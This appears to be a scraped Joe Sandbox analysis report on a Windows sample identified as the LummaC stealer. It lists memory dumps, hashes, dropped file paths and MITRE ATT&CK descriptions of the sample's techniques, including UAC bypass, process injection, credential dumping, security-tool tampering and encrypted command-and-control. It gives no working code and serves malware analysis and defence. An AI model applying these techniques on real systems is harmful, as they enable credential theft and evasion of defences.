Associated: 00000003.00000002.2457698817.0000000000A6A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457718208.0000000000A76000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457821275.0000000000BCF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457840222.0000000000BD1000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457863815.0000000000BF4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457899102.0000000000BFC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457916285.0000000000BFF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457937336.0000000000C11000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457954484.0000000000C12000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457976192.0000000000C2E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2457994969.0000000000C35000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458012404.0000000000C37000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458029623.0000000000C3A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458048085.0000000000C45000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458064594.0000000000C48000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458084522.0000000000C57000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458101881.0000000000C5A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458118913.0000000000C61000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458135716.0000000000C64000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458151976.0000000000C65000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458177332.0000000000C6D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458198735.0000000000C82000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458216125.0000000000C87000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458233219.0000000000C8E000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458251126.0000000000C91000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458270123.0000000000C99000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458287405.0000000000C9A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458325867.0000000000CF7000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458325867.0000000000CFD000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458362646.0000000000D0C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2458379114.0000000000D0E000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_4LSU4O6YQKPDF8R94WQ6K0Z23.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7390c961ab426c4a7c56adebd0399fb9c041fa47ca0ab7acfc1fc3e83effa190
Instruction ID: 7b4184ff3803119b2c09e88f4ff14bc3586f625177b563038de5ec4ef03e7e01
Opcode Fuzzy Hash: 7390c961ab426c4a7c56adebd0399fb9c041fa47ca0ab7acfc1fc3e83effa190
Instruction Fuzzy Hash: C7014CF200C2C92DF7819E7149449FF3FA9DA87230F3404DDE89085802C3554E069726

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4LSU4O6YQKPDF8R94WQ6K0Z23.exe.log

C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
file.exe

Function 055515D0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 299
COMMON

Function 00BEEE97 Relevance: 1.6, APIs: 1, Instructions: 50
fileCOMMON

Function 055515C4 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 300
COMMON

Function 05550D42 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60
COMMON

Function 05550D48 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59
COMMON

Function 05551510 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
serviceCOMMON

Function 05551509 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
serviceCOMMON

Function 05551301 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Function 05551308 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMON

Function 00BEC1B1 Relevance: 1.6, APIs: 1, Instructions: 91
libraryCOMMON

Function 00BEEEA8 Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Function 00BEF09B Relevance: 1.5, APIs: 1, Instructions: 48
fileCOMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre